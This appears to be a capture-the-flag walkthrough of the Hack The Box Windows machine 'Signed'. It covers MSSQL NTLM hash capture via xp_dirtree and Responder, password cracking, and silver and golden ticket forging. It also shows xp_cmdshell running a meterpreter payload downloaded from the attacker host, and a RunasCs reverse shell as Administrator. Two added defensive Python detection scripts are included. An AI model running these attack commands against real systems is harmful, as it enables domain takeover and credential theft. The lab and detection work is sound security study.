Medium - Windows - Signed

Recon

“As is common in real life Windows penetration tests, you will start the Signed box with credentials for the following account which can be used to access the MSSQL service: scott / Sm230#C5NatH”, so we can log in with impacket-mssqlclient 'signed.htb/scott:Sm230#C5NatH@10.129.66.12'. A quick nmap scan with the ms-sql scripts tells us more about the service.

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=scott,mssql.password=Sm230#C5NatH,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.66.12
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-12 15:16 BST
Nmap scan report for 10.129.66.12
Host is up (0.035s latency).

Bug in ms-sql-dac: no string output.
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ms-sql-config: ERROR: Script execution failed (use -d to debug)
| ms-sql-info: 
|   10.129.66.12:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ms-sql-hasdbaccess: ERROR: Script execution failed (use -d to debug)
|_ms-sql-tables: ERROR: Script execution failed (use -d to debug)
| ms-sql-xp-cmdshell: 
|_  (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.)
| ms-sql-dump-hashes: 
|   10.129.66.12:1433: 
|     sa:Null
|_    scott:Null
| ms-sql-empty-password: 
|_  10.129.66.12:1433: 
| ms-sql-ntlm-info: 
|   10.129.66.12:1433: 
|     Target_Name: SIGNED
|     NetBIOS_Domain_Name: SIGNED
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: SIGNED.HTB
|     DNS_Computer_Name: DC01.SIGNED.HTB
|     DNS_Tree_Name: SIGNED.HTB
|_    Product_Version: 10.0.17763

Looking online, we can find CVE-2024-37334, but no public PoC.

SQL (scott  guest@master)> SELECT name FROM sys.databases;

master   
tempdb  
model    
msdb

┌──(kali㉿kali)-[/home/kali/PowerUpSQL]
└─PS> Get-SQLServerInfo -Instance "10.129.66.12" -Username "scott" -Password "Sm230#C5NatH"

ComputerName           : 10.129.66.12
Instance               : DC01
DomainName             : SIGNED
ServiceProcessID       : 888
ServiceName            : MSSQLSERVER
ServiceAccount         : SIGNED\mssqlsvc
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 16.0.1000.6
SQLServerMajorVersion  : 2022
SQLServerEdition       : Enterprise Evaluation Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : scott
IsSysadmin             : No
ActiveSessions         : 1

The service account (SIGNED\mssqlsvc) is different from the user we logged in as. We can run responder -I tun0, make the SQL Server reach out to our host with xp_dirtree so the service account authenticates to Responder, and then crack the captured NetNTLMv2 hash with john.

SQL (scott  guest@master)> xp_dirtree \\<ip>\thissharedoesntexist

---

┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0
[SMB] NTLMv2-SSP Client   : 10.129.66.12
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::SIGNED:650c1aad4a692032:E5302536320D71D5B5F435698F28BC9A:010100000000000000FD1EB8853BDC0192F4AE5975C9A5DC0000000002000800370034004B004F0001001E00570049004E002D00380039004D004D00530031005A004A0057003300390004003400570049004E002D00380039004D004D00530031005A004A005700330039002E00370034004B004F002E004C004F00430041004C0003001400370034004B004F002E004C004F00430041004C0005001400370034004B004F002E004C004F00430041004C000700080000FD1EB8853BDC0106000400020000000800300030000000000000000000000000300000319EE653B160B28341C3ED4C355F4C30C500A5FDC80C37A5B308A91448C2B9F00A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370031000000000000000000

We then crack the captured hash.

┌──(kali㉿kali)-[~]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
purPLE9795!@     (mssqlsvc)    

With the recovered mssqlsvc credentials we can list every member of the sysadmin role on this MSSQL instance.

impacket-mssqlclient 'signed.htb/mssqlsvc:purPLE9795!@@10.129.66.12' -windows-auth -command "SELECT r.name AS role, m.name AS member FROM sys.server_principals r JOIN sys.server_role_members rm ON r.principal_id=rm.role_principal_id JOIN sys.server_principals m ON rm.member_principal_id=m.principal_id WHERE r.name='sysadmin';" 


role       member                      
--------   -------------------------   
sysadmin   sa                          
sysadmin   SIGNED\IT                   
sysadmin   NT SERVICE\SQLWriter        
sysadmin   NT SERVICE\Winmgmt          
sysadmin   NT SERVICE\MSSQLSERVER      
sysadmin   NT SERVICE\SQLSERVERAGENT   

We can also get the domain SID with SELECT name, sid FROM sys.server_principals WHERE sid IS NOT NULL AND name LIKE 'SIGNED%'; and forge a silver ticket with ticketer. For that, two things are needed (no ChatGPT required): the domain SID and the NT hash of the mssqlsvc password.

impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.signed.htb:1433 -groups 1105 -user-id 1103 mssqlsvc

Then it’s possible to log in using export KRB5CCNAME=mssqlsvc.ccache && impacket-mssqlclient -k -no-pass DC01.SIGNED.HTB and finally enable command execution with enable_xp_cmdshell followed by RECONFIGURE;.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.22 LPORT=2137 -f exe > shell-x64.exe
sudo http-server -p 80           
...and catch the callback with Metasploit
---

xp_cmdshell "powershell wget -UseBasicParsing http://10.10.15.22/shell-x64.exe -OutFile %temp%/shell-x64.exe"
xp_cmdshell "%temp%\\shell-x64.exe -nv 10.10.15.22 4444 -e cmd.exe"

and we finally get the user flag with cat /Users/mssqlsvc/Desktop/user.txt

Priv esc

We continue in the spirit of the box name by signing more tickets. Time for the golden ticket: the same ticketer approach, but with the Domain Admins and Enterprise Admins group RIDs added to the ticket. To get it, one of these two SIDs is needed.

PS C:\Windows\system32> Get-ADGroup "Domain Admins" | Select-Object Name, SID

Name          SID                                          
----          ---                                          
Domain Admins S-1-5-21-4088429403-1159899800-2753317549-512


PS C:\Windows\system32> Get-ADGroup "Enterprise Admins" | Select-Object Name, SID

Name              SID                                          
----              ---                                          
Enterprise Admins S-1-5-21-4088429403-1159899800-2753317549-519

---

impacket-ticketer -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain SIGNED.HTB -spn MSSQLSvc/DC01.SIGNED.HTB -groups 512,519,1105 -user-id 1103 mssqlsvc

export KRB5CCNAME=mssqlsvc.ccache && impacket-mssqlclient -k -no-pass DC01.SIGNED.HTB
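From the defender's side, a ticket forged with ticketer (both the silver ticket above and the one carrying the 512/519 RIDs) is built offline from the service account's key and never touches the KDC, so the target records a Kerberos network logon (4624) for which no service ticket request (4769) was ever logged by a DC. The following Python check is an added example, not part of the original writeup; the event records are constructed, and the 10-hour window assumes the default maximum ticket lifetime.

```python
from datetime import datetime, timedelta

# Constructed sample events (UTC), already parsed from 4769 (KDC) and 4624 (target) logs.
EVENTS = [
    {"id": 4769, "ts": "2025-10-12T14:00:05", "user": "scott",
     "spn": "MSSQLSvc/DC01.signed.htb:1433"},
    {"id": 4624, "ts": "2025-10-12T14:00:07", "user": "scott",
     "logon_type": 3, "package": "Kerberos", "host": "DC01"},
    # Kerberos logon as mssqlsvc with no 4769 behind it: forged ticket candidate
    {"id": 4624, "ts": "2025-10-12T15:40:10", "user": "mssqlsvc",
     "logon_type": 3, "package": "Kerberos", "host": "DC01"},
    # NTLM network logon: a different control covers this, skip it here
    {"id": 4624, "ts": "2025-10-12T15:41:00", "user": "mssqlsvc",
     "logon_type": 3, "package": "NTLM", "host": "DC01"},
]

# Default maximum service ticket lifetime (assumed): a genuine ticket may be
# reused for this long after the single 4769 that issued it.
TICKET_LIFETIME = timedelta(hours=10)

def find_unbacked_kerberos_logons(events, window=TICKET_LIFETIME):
    """Return (user, host, ts) for Kerberos network logons that no KDC 4769
    for the same account precedes within `window`. 4769 must be collected
    from every DC, otherwise legitimate logons are flagged as well."""
    tgs_times = {}
    for ev in events:
        if ev["id"] == 4769:
            tgs_times.setdefault(ev["user"].lower(), []).append(
                datetime.fromisoformat(ev["ts"]))
    flagged = []
    for ev in events:
        if ev["id"] != 4624 or ev.get("logon_type") != 3 \
                or ev.get("package") != "Kerberos":
            continue
        t = datetime.fromisoformat(ev["ts"])
        backed = any(t - window <= issued <= t
                     for issued in tgs_times.get(ev["user"].lower(), []))
        if not backed:
            flagged.append((ev["user"], ev["host"], ev["ts"]))
    return flagged

if __name__ == "__main__":
    for user, host, ts in find_unbacked_kerberos_logons(EVENTS):
        print(f"{ts} Kerberos logon as {user} on {host} with no matching TGS request")
```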

Then we can enable Ad Hoc Distributed Queries and read the flag straight from disk with OPENROWSET(BULK ...).

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;
SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt',SINGLE_CLOB) AS x;

To properly own the machine, the Administrator's username and password can be found in the PowerShell history file, which we read the same way.
SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt',SINGLE_CLOB) AS x;
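As an added example (not from the writeup), a small Python triage over constructed SQL Server audit records that flags the steps used above from a defender's seat: enabling xp_cmdshell or Ad Hoc Distributed Queries, OPENROWSET(BULK ...) reads outside an allow-listed directory, and xp_dirtree calls to UNC paths, which make the service account authenticate outbound. The audit record shape (login, statement text) and the allow-list prefix are assumptions.

```python
import re

# Constructed SQL Server audit records: (login, statement text). Not from the box.
AUDIT = [
    ("SIGNED\\mssqlsvc", "EXEC sp_configure 'show advanced options', 1;"),
    ("SIGNED\\mssqlsvc", "EXEC sp_configure 'Ad Hoc Distributed Queries', 1;"),
    ("SIGNED\\mssqlsvc", "SELECT * FROM OPENROWSET(BULK "
     "'C:\\Users\\Administrator\\Desktop\\root.txt',SINGLE_CLOB) AS x;"),
    ("SIGNED\\mssqlsvc", "SELECT * FROM OPENROWSET(BULK "
     "'D:\\imports\\orders.csv', SINGLE_CLOB) AS x;"),
    ("scott", "xp_dirtree '\\\\10.10.15.22\\thissharedoesntexist'"),
    ("scott", "SELECT name FROM sys.databases;"),
]

# Server options whose enabling is rarely legitimate outside a change window.
ENABLE_RE = re.compile(
    r"sp_configure\s+'(xp_cmdshell|ad hoc distributed queries|show advanced options)'"
    r"\s*,\s*1", re.I)
BULK_RE = re.compile(r"OPENROWSET\s*\(\s*BULK\s+'([^']+)'", re.I)
SHELL_RE = re.compile(r"\bxp_cmdshell\b", re.I)
# Extended procedures that take a path and will follow a UNC target.
UNC_RE = re.compile(r"xp_(dirtree|fileexist|subdirs)\s+'?(\\\\[^\\']+)", re.I)

# Assumed: the only directory bulk reads should ever touch on this server.
ALLOWED_BULK_PREFIX = ("d:\\imports\\",)

def triage(records, allowed=ALLOWED_BULK_PREFIX):
    """Return (login, finding, detail) tuples for the risky statements."""
    findings = []
    for login, stmt in records:
        m = ENABLE_RE.search(stmt)
        if m:
            findings.append((login, "enable_option", m.group(1).lower()))
        elif SHELL_RE.search(stmt):
            findings.append((login, "xp_cmdshell_exec", stmt))
        m = BULK_RE.search(stmt)
        if m and not m.group(1).lower().startswith(allowed):
            findings.append((login, "bulk_read_outside_allowlist", m.group(1)))
        m = UNC_RE.search(stmt)
        if m:
            findings.append((login, "unc_path_coercion", m.group(2)))
    return findings

if __name__ == "__main__":
    for login, finding, detail in triage(AUDIT):
        print(f"{login:18} {finding:28} {detail}")
```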

Then we can upload and run RunasCs.exe with those credentials to get a privileged shell.
.\RunasCs.exe Administrator Th1s889Rabb!t powershell.exe -r ip 2138